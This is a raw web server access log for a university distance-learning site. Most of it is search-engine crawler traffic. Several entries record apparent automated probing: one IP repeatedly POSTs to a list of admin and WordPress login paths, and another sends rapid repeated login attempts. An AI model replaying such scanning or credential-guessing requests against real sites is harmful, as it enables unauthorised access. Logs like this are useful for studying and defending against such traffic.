85.208.96.211 - - [14/Apr/2025:10:04:04 +0300] "GET /user/profile.php?id=105 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.199 - - [14/Apr/2025:10:06:16 +0300] "GET /course/view.php?id=547 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.202 - - [14/Apr/2025:10:06:31 +0300] "GET /course/view.php?id=597 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.6 - - [14/Apr/2025:10:11:14 +0300] "GET /course/view.php?id=588 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:10:21:21 +0300] "GET /course/index.php?categoryid=288 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.191.171.15 - - [14/Apr/2025:10:43:20 +0300] "GET /course/view.php?id=596 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.16 - - [14/Apr/2025:10:45:02 +0300] "GET /course/view.php?id=584 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
146.19.215.21 - - [14/Apr/2025:10:10:56 +0300] "POST /backend HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
207.46.13.150 - - [14/Apr/2025:10:20:43 +0300] "GET /course/view.php?id=321 HTTP/2" 303 637 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.150 - - [14/Apr/2025:10:20:44 +0300] "GET /login/index.php HTTP/2" 500 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.171 - - [14/Apr/2025:10:22:06 +0300] "GET /course/ HTTP/2" 500 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.14 - - [14/Apr/2025:10:28:28 +0300] "GET /login HTTP/2" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
17.241.227.196 - - [14/Apr/2025:10:33:49 +0300] "GET /course/index.php?categoryid=64 HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
85.208.96.197 - - [14/Apr/2025:10:36:14 +0300] "GET /user/profile.php?id=109 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.11 - - [14/Apr/2025:10:44:52 +0300] "GET /course/view.php?id=582 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.201 - - [14/Apr/2025:10:51:45 +0300] "GET /robots.txt HTTP/1.1" 404 796 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.5 - - [14/Apr/2025:10:51:45 +0300] "GET /course/view.php?id=507 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.128.227.74 - - [14/Apr/2025:10:48:21 +0300] "GET / HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.91 Safari/537.36"
185.128.227.74 - - [14/Apr/2025:10:48:27 +0300] "GET / HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36"
185.128.227.74 - - [14/Apr/2025:10:48:30 +0300] "GET / HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.101 Safari/537.36"
185.191.171.17 - - [14/Apr/2025:10:47:15 +0300] "GET /course/view.php?id=570 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.128.227.74 - - [14/Apr/2025:10:48:33 +0300] "GET / HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.103 Safari/537.36"
185.128.227.74 - - [14/Apr/2025:10:48:37 +0300] "GET / HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.101 Safari/537.36"
41.76.168.134 - - [14/Apr/2025:10:56:28 +0300] "GET /course/search.php HTTP/2" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
41.76.168.134 - - [14/Apr/2025:10:56:35 +0300] "GET /course/index.php?categoryid=241 HTTP/2" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
41.76.168.134 - - [14/Apr/2025:10:56:42 +0300] "GET /course/index.php?categoryid=251 HTTP/2" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
205.169.39.26 - - [14/Apr/2025:10:57:20 +0300] "GET / HTTP/1.1" 500 0 "http://distance.gluk.ac.ke" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.191.171.9 - - [14/Apr/2025:11:03:49 +0300] "GET /course/view.php?id=548 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
146.19.215.21 - - [14/Apr/2025:11:05:37 +0300] "POST /wp-admin HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
142.250.32.38 - - [14/Apr/2025:11:13:00 +0300] "GET /.well-known/traffic-advice HTTP/1.1" 404 796 "-" "Chrome Privacy Preserving Prefetch Proxy"
27.96.85.14 - - [14/Apr/2025:11:13:18 +0300] "GET /login/index.php HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
27.96.85.14 - - [14/Apr/2025:11:13:19 +0300] "POST /login/index.php HTTP/1.1" 303 763 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
185.191.171.9 - - [14/Apr/2025:11:19:24 +0300] "GET /course/view.php?id=586 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.186.4.85 - - [14/Apr/2025:11:20:56 +0300] "GET / HTTP/2" 500 0 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:11:25:57 +0300] "POST /wp-admin HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:11:25:57 +0300] "POST /wp-login.php HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:11:25:57 +0300] "POST /admin HTTP/1.1" 301 795 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:11:25:58 +0300] "GET /admin/ HTTP/1.1" 500 0 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:11:26:03 +0300] "POST /user/login HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:11:26:04 +0300] "POST /login HTTP/1.1" 301 795 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:11:26:04 +0300] "GET /login/ HTTP/1.1" 500 0 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:11:26:05 +0300] "POST /dashboard HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
85.208.96.211 - - [14/Apr/2025:10:58:59 +0300] "GET /course/view.php?id=581 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.201 - - [14/Apr/2025:11:03:38 +0300] "GET /user/profile.php?id=115 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
146.19.215.21 - - [14/Apr/2025:11:05:37 +0300] "POST /wp-login.php HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:11:05:37 +0300] "POST /admin HTTP/1.1" 301 795 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:11:05:37 +0300] "GET /admin/ HTTP/1.1" 500 0 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:11:05:42 +0300] "POST /user/login HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:11:05:42 +0300] "POST /login HTTP/1.1" 301 795 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:11:05:42 +0300] "GET /login/ HTTP/1.1" 500 0 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:11:05:42 +0300] "POST /dashboard HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:11:05:42 +0300] "POST /cms HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:11:05:42 +0300] "POST /panel HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:11:05:42 +0300] "POST /backend HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
193.186.4.85 - - [14/Apr/2025:11:13:00 +0300] "GET / HTTP/2" 500 0 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
114.119.134.165 - - [14/Apr/2025:11:16:31 +0300] "GET /theme/switchdevice.php?url=https://distance.gluk.ac.ke/login/index.php&device=default&sesskey=RYu4DHuK4a HTTP/1.1" 404 0 "https://distance.gluk.ac.ke/course/view.php?id=123" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
185.191.171.19 - - [14/Apr/2025:11:19:37 +0300] "GET /course/view.php?id=562 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
165.22.254.158 - - [14/Apr/2025:11:31:30 +0300] "GET /login/index.php HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
165.22.254.158 - - [14/Apr/2025:11:31:31 +0300] "POST /login/index.php HTTP/1.1" 303 763 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:11:26:05 +0300] "POST /cms HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:11:26:06 +0300] "POST /panel HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:11:26:06 +0300] "POST /backend HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
66.249.66.19 - - [14/Apr/2025:11:27:19 +0300] "GET /course/index.php?categoryid=282 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.191.171.12 - - [14/Apr/2025:11:28:56 +0300] "GET /course/view.php?id=528 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
165.22.254.158 - - [14/Apr/2025:11:31:12 +0300] "GET /login/index.php HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
165.22.254.158 - - [14/Apr/2025:11:31:13 +0300] "POST /login/index.php HTTP/1.1" 303 763 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
165.22.254.158 - - [14/Apr/2025:11:31:14 +0300] "GET /login/index.php HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
165.22.254.158 - - [14/Apr/2025:11:31:15 +0300] "POST /login/index.php HTTP/1.1" 303 763 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
165.22.254.158 - - [14/Apr/2025:11:31:28 +0300] "GET /login/index.php HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
165.22.254.158 - - [14/Apr/2025:11:31:29 +0300] "POST /login/index.php HTTP/1.1" 303 763 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
165.22.254.158 - - [14/Apr/2025:11:31:46 +0300] "GET /login/index.php HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
165.22.254.158 - - [14/Apr/2025:11:31:47 +0300] "POST /login/index.php HTTP/1.1" 303 763 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
165.22.254.158 - - [14/Apr/2025:11:31:48 +0300] "GET /login/index.php HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
165.22.254.158 - - [14/Apr/2025:11:31:49 +0300] "POST /login/index.php HTTP/1.1" 303 763 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
85.208.96.211 - - [14/Apr/2025:11:38:22 +0300] "GET /course/view.php?id=573 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.18 - - [14/Apr/2025:11:40:17 +0300] "GET /user/profile.php?id=107 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.18 - - [14/Apr/2025:11:43:18 +0300] "GET /course/view.php?id=495 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.66.19 - - [14/Apr/2025:11:52:26 +0300] "GET /site/?pg=Enzo8882+bet HTTP/1.1" 200 73613 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
165.22.254.158 - - [14/Apr/2025:11:31:34 +0300] "GET /login/index.php HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
165.22.254.158 - - [14/Apr/2025:11:31:35 +0300] "POST /login/index.php HTTP/1.1" 303 763 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
165.22.254.158 - - [14/Apr/2025:11:31:36 +0300] "GET /login/index.php HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
165.22.254.158 - - [14/Apr/2025:11:31:37 +0300] "POST /login/index.php HTTP/1.1" 303 763 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
185.191.171.11 - - [14/Apr/2025:11:36:30 +0300] "GET /user/profile.php?id=108 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.198 - - [14/Apr/2025:11:40:03 +0300] "GET /course/view.php?id=593 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.1 - - [14/Apr/2025:12:25:23 +0300] "GET /user/profile.php?id=106 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.212 - - [14/Apr/2025:12:02:08 +0300] "GET /robots.txt HTTP/1.1" 404 796 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.203 - - [14/Apr/2025:12:02:09 +0300] "GET /course/view.php?id=594 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
146.19.215.21 - - [14/Apr/2025:12:03:37 +0300] "POST /wp-admin HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:12:03:37 +0300] "POST /wp-login.php HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:12:03:38 +0300] "POST /admin HTTP/1.1" 301 795 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:12:03:38 +0300] "GET /admin/ HTTP/1.1" 500 0 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:12:03:43 +0300] "POST /user/login HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:12:03:43 +0300] "POST /login HTTP/1.1" 301 795 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:12:03:43 +0300] "GET /login/ HTTP/1.1" 500 0 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:12:03:44 +0300] "POST /dashboard HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:12:03:44 +0300] "POST /cms HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:12:03:44 +0300] "POST /panel HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
146.19.215.21 - - [14/Apr/2025:12:03:44 +0300] "POST /backend HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
85.208.96.203 - - [14/Apr/2025:12:06:29 +0300] "GET /course/view.php?id=561 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.193 - - [14/Apr/2025:12:16:35 +0300] "GET /course/view.php?id=532 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.3 - - [14/Apr/2025:12:29:42 +0300] "GET /course/view.php?id=515 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.197 - - [14/Apr/2025:12:38:34 +0300] "GET /course/view.php?id=497 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.201 - - [14/Apr/2025:12:44:43 +0300] "GET /course/view.php?id=512 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
114.119.148.37 - - [14/Apr/2025:12:53:54 +0300] "GET /theme/switchdevice.php?url=https://distance.gluk.ac.ke/login/index.php&device=default&sesskey=1h9hpBE1hD HTTP/1.1" 404 0 "https://distance.gluk.ac.ke/course/view.php?id=126" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
85.208.96.200 - - [14/Apr/2025:12:55:28 +0300] "GET /course/view.php?id=533 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.6 - - [14/Apr/2025:12:57:06 +0300] "GET /course/view.php?id=571 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
114.119.154.135 - - [14/Apr/2025:12:59:01 +0300] "GET /login/index.php HTTP/1.1" 500 0 "https://distance.gluk.ac.ke/course/index.php?categoryid=215" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
85.208.96.196 - - [14/Apr/2025:12:59:50 +0300] "GET /course/view.php?id=498 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.211 - - [14/Apr/2025:13:05:09 +0300] "GET /course/view.php?id=508 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.16 - - [14/Apr/2025:13:07:56 +0300] "GET /course/view.php?id=510 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
183.207.45.126 - - [14/Apr/2025:13:09:35 +0300] "GET / HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
85.208.96.210 - - [14/Apr/2025:13:13:32 +0300] "GET /course/view.php?id=501 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.18 - - [14/Apr/2025:13:16:32 +0300] "GET /course/view.php?id=565 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
